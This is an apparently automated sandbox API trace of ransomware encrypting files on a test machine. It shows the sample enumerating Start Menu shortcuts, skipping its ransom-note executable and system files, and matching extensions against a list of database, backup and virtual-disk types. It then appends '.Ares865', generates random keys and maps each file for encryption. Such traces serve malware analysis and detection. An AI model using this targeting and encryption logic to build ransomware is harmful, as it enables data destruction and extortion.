[0092.678] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0092.678] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.678] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.679] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0092.679] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0092.679] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0092.679] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0092.679] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0092.679] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0092.679] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0092.679] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0092.679] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0092.679] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0092.679] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0092.679] CloseHandle (hObject=0x15c) returned 1 [0092.679] CloseHandle (hObject=0x118) returned 1 [0092.680] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0092.680] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0092.680] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0092.680] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x1ab4d101, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x54e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ease of Access.lnk", cAlternateFileName="EASEOF~1.LNK")) returned 1 [0092.680] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.681] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="aoldtz.exe") returned 1 [0092.681] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2=".") returned 1 [0092.681] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="..") returned 1 [0092.681] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="windows") returned -1 [0092.681] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="bootmgr") returned 1 [0092.681] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="temp") returned -1 [0092.681] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="pagefile.sys") returned -1 [0092.681] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="boot") returned 1 [0092.681] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="ids.txt") returned -1 [0092.681] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="ntuser.dat") returned -1 [0092.681] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="perflogs") returned -1 [0092.681] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="MSBuild") returned -1 [0092.681] lstrlenW (lpString="Ease of Access.lnk") returned 18 [0092.681] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Accessibility\\Desktop.ini") returned 87 [0092.681] lstrcpyW (in: lpString1=0x2cce498, lpString2="Ease of Access.lnk" | out: lpString1="Ease of Access.lnk") returned="Ease of Access.lnk" [0092.681] lstrlenW (lpString="Ease of Access.lnk") returned 18 [0092.681] lstrlenW (lpString="Ares865") returned 7 [0092.681] lstrcmpiW (lpString1="ess.lnk", lpString2="Ares865") returned 1 [0092.681] lstrlenW (lpString=".dll") returned 4 [0092.681] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2=".dll") returned 1 [0092.681] lstrlenW (lpString=".lnk") returned 4 [0092.681] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2=".lnk") returned 1 [0092.681] lstrlenW (lpString=".ini") returned 4 [0092.681] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2=".ini") returned 1 [0092.681] lstrlenW (lpString=".sys") returned 4 [0092.681] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2=".sys") returned 1 [0092.681] lstrlenW (lpString="Ease of Access.lnk") returned 18 [0092.681] lstrlenW (lpString="bak") returned 3 [0092.681] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0092.681] lstrlenW (lpString="ba_") returned 3 [0092.681] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0092.681] lstrlenW (lpString="dbb") returned 3 [0092.681] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0092.681] lstrlenW (lpString="vmdk") returned 4 [0092.681] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0092.681] lstrlenW (lpString="rar") returned 3 [0092.682] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0092.682] lstrlenW (lpString="zip") returned 3 [0092.682] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0092.682] lstrlenW (lpString="tgz") returned 3 [0092.682] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0092.682] lstrlenW (lpString="vbox") returned 4 [0092.682] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0092.682] lstrlenW (lpString="vdi") returned 3 [0092.682] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0092.682] lstrlenW (lpString="vhd") returned 3 [0092.682] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0092.682] lstrlenW (lpString="vhdx") returned 4 [0092.682] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0092.682] lstrlenW (lpString="avhd") returned 4 [0092.682] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0092.682] lstrlenW (lpString="db") returned 2 [0092.682] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0092.682] lstrlenW (lpString="db2") returned 3 [0092.682] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0092.682] lstrlenW (lpString="db3") returned 3 [0092.682] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0092.682] lstrlenW (lpString="dbf") returned 3 [0092.682] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0092.682] lstrlenW (lpString="mdf") returned 3 [0092.682] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0092.682] lstrlenW (lpString="mdb") returned 3 [0092.682] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0092.682] lstrlenW (lpString="sql") returned 3 [0092.682] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0092.682] lstrlenW (lpString="sqlite") returned 6 [0092.682] lstrcmpiW (lpString1="ss.lnk", lpString2="sqlite") returned 1 [0092.682] lstrlenW (lpString="sqlite3") returned 7 [0092.682] lstrcmpiW (lpString1="ess.lnk", lpString2="sqlite3") returned -1 [0092.682] lstrlenW (lpString="sqlitedb") returned 8 [0092.682] lstrcmpiW (lpString1="cess.lnk", lpString2="sqlitedb") returned -1 [0092.682] lstrlenW (lpString="xml") returned 3 [0092.683] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0092.683] lstrlenW (lpString="$er") returned 3 [0092.683] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0092.683] lstrlenW (lpString="4dd") returned 3 [0092.683] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0092.683] lstrlenW (lpString="4dl") returned 3 [0092.683] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0092.683] lstrlenW (lpString="^^^") returned 3 [0092.683] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0092.683] lstrlenW (lpString="abs") returned 3 [0092.683] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0092.683] lstrlenW (lpString="abx") returned 3 [0092.683] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0092.683] lstrlenW (lpString="accdb") returned 5 [0092.683] lstrcmpiW (lpString1="s.lnk", lpString2="accdb") returned 1 [0092.683] lstrlenW (lpString="accdc") returned 5 [0092.683] lstrcmpiW (lpString1="s.lnk", lpString2="accdc") returned 1 [0092.683] lstrlenW (lpString="accde") returned 5 [0092.683] lstrcmpiW (lpString1="s.lnk", lpString2="accde") returned 1 [0092.683] lstrlenW (lpString="accdr") returned 5 [0092.683] lstrcmpiW (lpString1="s.lnk", lpString2="accdr") returned 1 [0092.683] lstrlenW (lpString="accdt") returned 5 [0092.683] lstrcmpiW (lpString1="s.lnk", lpString2="accdt") returned 1 [0092.683] lstrlenW (lpString="accdw") returned 5 [0092.683] lstrcmpiW (lpString1="s.lnk", lpString2="accdw") returned 1 [0092.683] lstrlenW (lpString="accft") returned 5 [0092.683] lstrcmpiW (lpString1="s.lnk", lpString2="accft") returned 1 [0092.683] lstrlenW (lpString="adb") returned 3 [0092.683] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0092.683] lstrlenW (lpString="adb") returned 3 [0092.683] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0092.683] lstrlenW (lpString="ade") returned 3 [0092.683] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0092.683] lstrlenW (lpString="adf") returned 3 [0092.683] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0092.684] lstrlenW (lpString="adn") returned 3 [0092.684] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0092.684] lstrlenW (lpString="adp") returned 3 [0092.684] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0092.684] lstrlenW (lpString="alf") returned 3 [0092.684] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0092.684] lstrlenW (lpString="ask") returned 3 [0092.684] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0092.684] lstrlenW (lpString="btr") returned 3 [0092.684] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0092.684] lstrlenW (lpString="cat") returned 3 [0092.684] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0092.684] lstrlenW (lpString="cdb") returned 3 [0092.684] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0092.684] lstrlenW (lpString="ckp") returned 3 [0092.684] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0092.684] lstrlenW (lpString="cma") returned 3 [0092.684] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0092.684] lstrlenW (lpString="cpd") returned 3 [0092.684] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0092.684] lstrlenW (lpString="dacpac") returned 6 [0092.684] lstrcmpiW (lpString1="ss.lnk", lpString2="dacpac") returned 1 [0092.684] lstrlenW (lpString="dad") returned 3 [0092.684] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0092.685] lstrlenW (lpString="dadiagrams") returned 10 [0092.685] lstrcmpiW (lpString1="Access.lnk", lpString2="dadiagrams") returned -1 [0092.685] lstrlenW (lpString="daschema") returned 8 [0092.685] lstrcmpiW (lpString1="cess.lnk", lpString2="daschema") returned -1 [0092.685] lstrlenW (lpString="db-journal") returned 10 [0092.685] lstrcmpiW (lpString1="Access.lnk", lpString2="db-journal") returned -1 [0092.685] lstrlenW (lpString="db-shm") returned 6 [0092.685] lstrcmpiW (lpString1="ss.lnk", lpString2="db-shm") returned 1 [0092.685] lstrlenW (lpString="db-wal") returned 6 [0092.685] lstrcmpiW (lpString1="ss.lnk", lpString2="db-wal") returned 1 [0092.685] lstrlenW (lpString="dbc") returned 3 [0092.685] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0092.685] lstrlenW (lpString="dbs") returned 3 [0092.685] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0092.685] lstrlenW (lpString="dbt") returned 3 [0092.685] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0092.685] lstrlenW (lpString="dbv") returned 3 [0092.685] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0092.685] lstrlenW (lpString="dbx") returned 3 [0092.685] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0092.685] lstrlenW (lpString="dcb") returned 3 [0092.685] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0092.685] lstrcmpiW (lpString1="lnk", lpString2="dct") returned 1 [0092.686] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Accessibility\\Ease of Access.lnk.Ares865") returned 102 [0092.686] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Accessibility\\Ease of Access.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\accessories\\accessibility\\ease of access.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Accessibility\\Ease of Access.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\accessories\\accessibility\\ease of access.lnk.ares865"), dwFlags=0x1) returned 1 [0092.687] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Accessibility\\Ease of Access.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\accessories\\accessibility\\ease of access.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.688] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1358) returned 1 [0092.688] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0092.688] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0092.688] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0092.688] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0092.689] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.689] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.689] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x850, lpName=0x0) returned 0x15c [0092.690] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x850) returned 0x190000 [0092.692] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0092.693] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.693] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.693] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0092.693] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0092.693] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0092.693] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0092.693] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0092.693] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0092.693] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0092.693] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0092.693] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0092.693] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0092.693] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0092.693] CloseHandle (hObject=0x15c) returned 1 [0092.693] CloseHandle (hObject=0x118) returned 1 [0092.694] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0092.694] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0092.694] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0092.694] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d111ec0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4d111ec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0092.694] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0092.694] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x1a98407e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4ea, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Magnify.lnk", cAlternateFileName="")) returned 1 [0092.694] lstrcmpiW (lpString1="Magnify.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0092.694] lstrcmpiW (lpString1="Magnify.lnk", lpString2="aoldtz.exe") returned 1 [0092.694] lstrcmpiW (lpString1="Magnify.lnk", lpString2=".") returned 1 [0092.694] lstrcmpiW (lpString1="Magnify.lnk", lpString2="..") returned 1 [0092.694] lstrcmpiW (lpString1="Magnify.lnk", lpString2="windows") returned -1 [0092.694] lstrcmpiW (lpString1="Magnify.lnk", lpString2="bootmgr") returned 1 [0092.694] lstrcmpiW (lpString1="Magnify.lnk", lpString2="temp") returned -1 [0092.694] lstrcmpiW (lpString1="Magnify.lnk", lpString2="pagefile.sys") returned -1 [0092.694] lstrcmpiW (lpString1="Magnify.lnk", lpString2="boot") returned 1 [0092.694] lstrcmpiW (lpString1="Magnify.lnk", lpString2="ids.txt") returned 1 [0092.694] lstrcmpiW (lpString1="Magnify.lnk", lpString2="ntuser.dat") returned -1 [0092.694] lstrcmpiW (lpString1="Magnify.lnk", lpString2="perflogs") returned -1 [0092.694] lstrcmpiW (lpString1="Magnify.lnk", lpString2="MSBuild") returned -1 [0092.694] lstrlenW (lpString="Magnify.lnk") returned 11 [0092.694] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Accessibility\\Ease of Access.lnk") returned 94 [0092.694] lstrcpyW (in: lpString1=0x2cce498, lpString2="Magnify.lnk" | out: lpString1="Magnify.lnk") returned="Magnify.lnk" [0092.694] lstrlenW (lpString="Magnify.lnk") returned 11 [0092.694] lstrlenW (lpString="Ares865") returned 7 [0092.694] lstrcmpiW (lpString1="ify.lnk", lpString2="Ares865") returned 1 [0092.694] lstrlenW (lpString=".dll") returned 4 [0092.694] lstrcmpiW (lpString1="Magnify.lnk", lpString2=".dll") returned 1 [0092.694] lstrlenW (lpString=".lnk") returned 4 [0092.694] lstrcmpiW (lpString1="Magnify.lnk", lpString2=".lnk") returned 1 [0092.695] lstrlenW (lpString=".ini") returned 4 [0092.695] lstrcmpiW (lpString1="Magnify.lnk", lpString2=".ini") returned 1 [0092.695] lstrlenW (lpString=".sys") returned 4 [0092.695] lstrcmpiW (lpString1="Magnify.lnk", lpString2=".sys") returned 1 [0092.695] lstrlenW (lpString="Magnify.lnk") returned 11 [0092.695] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Accessibility\\Magnify.lnk.Ares865") returned 95 [0092.695] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Accessibility\\Magnify.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\accessories\\accessibility\\magnify.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Accessibility\\Magnify.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\accessories\\accessibility\\magnify.lnk.ares865"), dwFlags=0x1) returned 1 [0092.696] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Accessibility\\Magnify.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\accessories\\accessibility\\magnify.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.697] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1258) returned 1 [0092.697] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0092.697] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0092.697] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0092.697] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0092.698] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.698] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.698] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7f0, lpName=0x0) returned 0x15c [0092.700] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7f0) returned 0x190000 [0092.700] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0092.701] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.701] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.701] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0092.701] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0092.701] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0092.701] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0092.701] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0092.701] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0092.701] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0092.701] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0092.702] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0092.702] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0092.702] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0092.702] CloseHandle (hObject=0x15c) returned 1 [0092.702] CloseHandle (hObject=0x118) returned 1 [0092.702] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0092.702] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0092.702] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0092.702] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x1b733f17, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4ee, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Narrator.lnk", cAlternateFileName="")) returned 1 [0092.702] lstrcmpiW (lpString1="Narrator.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0092.702] lstrcmpiW (lpString1="Narrator.lnk", lpString2="aoldtz.exe") returned 1 [0092.702] lstrcmpiW (lpString1="Narrator.lnk", lpString2=".") returned 1 [0092.702] lstrcmpiW (lpString1="Narrator.lnk", lpString2="..") returned 1 [0092.702] lstrcmpiW (lpString1="Narrator.lnk", lpString2="windows") returned -1 [0092.702] lstrcmpiW (lpString1="Narrator.lnk", lpString2="bootmgr") returned 1 [0092.702] lstrcmpiW (lpString1="Narrator.lnk", lpString2="temp") returned -1 [0092.702] lstrcmpiW (lpString1="Narrator.lnk", lpString2="pagefile.sys") returned -1 [0092.702] lstrcmpiW (lpString1="Narrator.lnk", lpString2="boot") returned 1 [0092.702] lstrcmpiW (lpString1="Narrator.lnk", lpString2="ids.txt") returned 1 [0092.702] lstrcmpiW (lpString1="Narrator.lnk", lpString2="ntuser.dat") returned -1 [0092.702] lstrcmpiW (lpString1="Narrator.lnk", lpString2="perflogs") returned -1 [0092.702] lstrcmpiW (lpString1="Narrator.lnk", lpString2="MSBuild") returned 1 [0092.702] lstrlenW (lpString="Narrator.lnk") returned 12 [0092.702] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Accessibility\\Magnify.lnk") returned 87 [0092.702] lstrcpyW (in: lpString1=0x2cce498, lpString2="Narrator.lnk" | out: lpString1="Narrator.lnk") returned="Narrator.lnk" [0092.703] lstrlenW (lpString="Narrator.lnk") returned 12 [0092.703] lstrlenW (lpString="Ares865") returned 7 [0092.703] lstrcmpiW (lpString1="tor.lnk", lpString2="Ares865") returned 1 [0092.703] lstrlenW (lpString=".dll") returned 4 [0092.703] lstrcmpiW (lpString1="Narrator.lnk", lpString2=".dll") returned 1 [0092.703] lstrlenW (lpString=".lnk") returned 4 [0092.703] lstrcmpiW (lpString1="Narrator.lnk", lpString2=".lnk") returned 1 